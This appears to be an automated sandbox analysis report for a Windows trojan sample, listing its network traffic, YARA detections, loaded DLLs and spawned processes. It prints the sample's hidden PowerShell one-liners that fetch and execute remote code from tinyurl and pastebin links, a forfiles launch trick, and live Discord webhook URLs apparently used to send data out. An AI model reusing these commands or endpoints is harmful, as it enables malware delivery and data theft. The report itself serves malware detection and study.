Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /raw/sA04Mwk2 HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: pastebin.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: tinyurl.com
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: global trafficDNS traffic detected: DNS query: pastebin.com
Source: global trafficDNS traffic detected: DNS query: discord.com
Source: unknownHTTP traffic detected: POST /api/webhooks/1295171900019966004/KRGDAVzqdqMZILdh_WVWyqLwT2_aVjXOXnoEnaoZ5xZY_kNOmMNm2yrdQTKMOzXSXWSI HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Content-Type: application/jsonHost: discord.comContent-Length: 221Connection: Keep-Alive
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:14:36 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729001677x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wPxKt9MG9bJJOrzM1500muY%2BGA9HhxKiTXV%2F6SRNrDZKmEtQMCpnr%2BLxq%2Flzx7h%2F0qRKUX3%2FqN01lwL97SmUM1ror4pn6HVKqaEn0zabLRvbPP2eqvgYxu%2BmVxdU"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=bbe5fda4ea418ad36a12c7c3c77b47322380c754-1729001676; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=IiF0HC0Z.L8CyYwgGiPOb8cnN7yQrD_mfCVJfeaiDYU-1729001676479-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d306a9d39636c70-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:14:49 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729001690x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=RBg5VpEGJksBj88e%2FpF1HTCxBlyQZ8LQ%2FKyjMAj0IYkXAb2Nh997Xx0%2BtQdpbz0QycVAzXl3B4xwyHDDRJ3XJLwGilnrJ8nOMl5hyZIEiXrzyxUtU27U0%2B4mqqIC"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=2bb82488d4e515ff095380bb0caf5eeea8f3ffd5-1729001689; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=.q7tJufObXaAyTYGfSoGaePTBWN0eKpwAiP3IdCiRj0-1729001689157-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d306aecaadee922-DFW
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 15 Oct 2024 14:14:56 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1729001697x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KiFTFZTyAkPDCd4EbDg1vj%2FtKdvKkf7CV4Qczsqila%2FAUOZxVGV2EQR4AnjqSXvrWE289u%2BkpkDhgkmjjWLnlWD%2FPPU0KXVsc%2BLXFuW%2BiiNbQInPuqEwjtqrOQvR"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=5f98e86f145995a5c309442813900510527bbeff-1729001696; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=8dhZE4fnVwq1NdwetEp7QCML5rdw_jPPYmBxbRZ2W_Y-1729001696380-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8d306b19cc97eb37-DFW
Source: powershell.exe, 0000000A.00000002.2993893334.000002544344C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE492F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://discord.com
Source: powershell.exe, 0000000A.00000002.2993893334.0000025442914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2993893334.00000254428FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2993893334.00000254423A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3EC8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com
Source: powershell.exe, 0000000F.00000002.2855452101.000001FDE3A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000A.00000002.2993893334.0000025442993000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2993893334.00000254429C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3F92000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 0000000F.00000002.2855452101.000001FDE3F61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: powershell.exe, 0000000A.00000002.2993893334.0000025441EA1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3495000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 0000000A.00000002.2993893334.0000025441EE9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2993893334.0000025441EFD000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE34B9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE34CD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 0000000A.00000002.2993893334.000002544344C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE492F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com
Source: powershell.exe, 0000000A.00000002.2993893334.000002544344C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE492F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/128545359042878
Source: powershell.exe, 0000000A.00000002.2993893334.0000025442A2E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3FFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQ
Source: powershell.exe, 0000000F.00000002.2855452101.000001FDE3FFB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://discord.com/api/webhooks/1285453590428782614/2ICVsBAPEUQjq3aCyFPX9ce6WexTwa29I1FddkY5ZuTql0_
Source: powershell.exe, 0000000A.00000002.2993893334.00000254423A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3A26000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 0000000A.00000002.2993893334.0000025442904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3ED2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com
Source: powershell.exe, 0000000A.00000002.2993893334.0000025442904000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2993893334.00000254428FA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3ED2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3EC8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://pastebin.com/raw/sA04Mwk2
Source: powershell.exe, 0000000A.00000002.2993893334.00000254429C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 0000000A.00000002.2993893334.0000025442914000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.2993893334.00000254429C2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3EE2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2855452101.000001FDE3F92000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49765 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49834 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49838 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49841 version: TLS 1.2
Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.6:49849 version: TLS 1.2
Source: unknownHTTPS traffic detected: 185.199.108.133:443 -> 192.168.2.6:49853 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49865 version: TLS 1.2
Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.6:49895 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: amsi64_6272.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: amsi64_6976.amsi.csv, type: OTHERMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6272, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 6976, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3465C72210_2_00007FFD3465C722
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD3465B97610_2_00007FFD3465B976
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 10_2_00007FFD347233D510_2_00007FFD347233D5
Source: vF20HtY4a4.exeStatic PE information: No import functions for PE file found
Source: vF20HtY4a4.exe, 00000000.00000000.2133962707.00000197C6782000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameOrigami.exe0 vs vF20HtY4a4.exe
Source: vF20HtY4a4.exe, 00000000.00000002.3997956199.00000197C6A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXE.MUIj% vs vF20HtY4a4.exe
Source: vF20HtY4a4.exe, 00000000.00000002.3997956199.00000197C6A48000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamePowerShell.EXEj% vs vF20HtY4a4.exe
Source: vF20HtY4a4.exeBinary or memory string: OriginalFilenameOrigami.exe0 vs vF20HtY4a4.exe
Source: amsi64_6272.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: amsi64_6976.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6272, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 6976, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal92.troj.evad.winEXE@19/14@4/4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5276:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iyketovy.sud.ps1Jump to behavior
Source: vF20HtY4a4.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: vF20HtY4a4.exeStatic file information: TRID: Win64 Executable Console Net Framework (206006/5) 48.58%
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
Source: C:\Users\user\Desktop\vF20HtY4a4.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: vF20HtY4a4.exeReversingLabs: Detection: 34%
Source: unknownProcess created: C:\Users\user\Desktop\vF20HtY4a4.exe "C:\Users\user\Desktop\vF20HtY4a4.exe"
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"
Source: unknownProcess created: C:\Windows\System32\forfiles.exe "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
Source: C:\Users\user\Desktop\vF20HtY4a4.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command sleep 10; sal notpad iex; sal windowS_nt iwr ; notpad(windows_NT tinyurl.com/bdhpvpny -usebasicparsing)Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\attrib.exe "C:\Windows\system32\attrib.exe" +s +h "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Windows\System32\forfiles.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"Jump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: wldp.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: propsys.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: profapi.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: edputil.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: netutils.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: slc.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: userenv.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: sppc.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Users\user\Desktop\vF20HtY4a4.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
